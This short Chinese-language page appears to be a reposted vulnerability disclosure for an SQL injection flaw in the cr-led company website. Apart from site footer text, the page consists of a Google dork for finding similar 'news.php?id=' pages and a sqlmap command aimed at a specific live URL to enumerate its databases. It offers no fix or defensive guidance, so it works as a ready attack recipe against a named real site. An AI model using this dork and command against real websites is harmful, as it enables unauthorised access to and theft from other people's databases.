cr-led 网站SQL注入漏洞分析

本文披露了cr-led网站存在的SQL注入漏洞细节,提供了利用Google Dork定位漏洞页面的方法,并展示了使用sqlmap自动化工具进行数据库探测的具体攻击命令。

cr-led - SQL注入

2025.12.01 提交者: javad rashidi

风险等级: 中等

本地利用:

远程利用:

CVE编号: N/A

CWE编号: N/A

Google搜索关键词(Dork): inurl:"news.php?id="

# 漏洞标题: cr-led - SQL注入 # 发现日期: 11-13-2025 # 漏洞提交者: javad rashidi # 测试环境: Windows, Linux # Google搜索关键词(Dork): inurl:"news.php?id="

利用方法(Sqlmap命令):

1

sqlmap -u "https://www.cr-led.com/news.php?id=4" --dbs
comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次